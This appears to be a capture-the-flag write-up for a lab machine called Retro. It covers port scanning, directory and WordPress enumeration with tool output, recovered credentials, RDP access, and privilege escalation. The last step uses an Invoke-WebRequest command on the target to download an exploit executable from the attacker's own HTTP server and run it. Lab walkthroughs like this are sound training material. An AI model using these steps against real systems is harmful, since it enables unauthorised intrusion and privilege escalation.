Retro
New high score!
Scanning
Nmap
nmap -F 10.10.163.171
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 15:34 BST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.00% done; ETC: 15:35 (0:00:19 remaining)
Nmap scan report for ip-10-10-163-171.eu-west-1.compute.internal (10.10.163.171)
Host is up (0.00061s latency).
Not shown: 98 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
MAC Address: 02:80:9E:E4:33:A3 (Unknown)
​
Nmap done: 1 IP address (1 host up) scanned in 2.20 secondshttp and rdp running
Recon
port 80
dir busting
gobuster dir -u http://10.10.2.49/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.2.49/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/09/26 16:47:14 Starting gobuster
===============================================================
/retro (Status: 301)
===============================================================
2021/09/26 16:47:18 Finished
===============================================================nikto
nikto -host http://10.10.163.171/retro/
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.163.171
+ Target Hostname: ip-10-10-163-171.eu-west-1.compute.internal
+ Target Port: 80
+ Start Time: 2021-09-26 15:28:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'link' found, with contents: <http://localhost/retro/index.php/wp-json/>; rel="https://api.w.org/"
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
​wpScan
wpscan --url http://10.10.163.171/retro/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
​
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
​
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://10.10.163.171/retro/ [10.10.163.171]
[+] Started: Sun Sep 26 15:30:07 2021
​
Interesting Finding(s):
​
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
​
[+] XML-RPC seems to be enabled: http://10.10.163.171/retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
​
[+] WordPress readme found: http://10.10.163.171/retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
​
[+] The external WP-Cron seems to be enabled: http://10.10.163.171/retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
​
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.163.171/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.163.171/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
​
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.163.171/retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.163.171/retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
​
[+] Enumerating All Plugins (via Passive Methods)
​
[i] No plugins Found.
​
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <======================================================================================================================================> (22 / 22) 100.00% Time: 00:00:00
​
[i] No Config Backups Found.
​
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
​
[+] Finished: Sun Sep 26 15:30:20 2021
[+] Requests Done: 51
[+] Cached Requests: 5
[+] Data Sent: 11.638 KB
[+] Data Received: 175.524 KB
[+] Memory used: 220.398 MB
[+] Elapsed time: 00:00:12check directory /retro
after some enum i found this bath
credentials wade:parzival
Initial Access
RDP connection
Privilege Escalation
check build number using system info
this exploit works here
Steps
download zip file
extract it
setup http server
python -m http.serveron target
Invoke-WebRequest -urlcache -f -Uri [http://[your_ip/path_to_execuable] -OutFile [exeutable_name]run it
Last updated
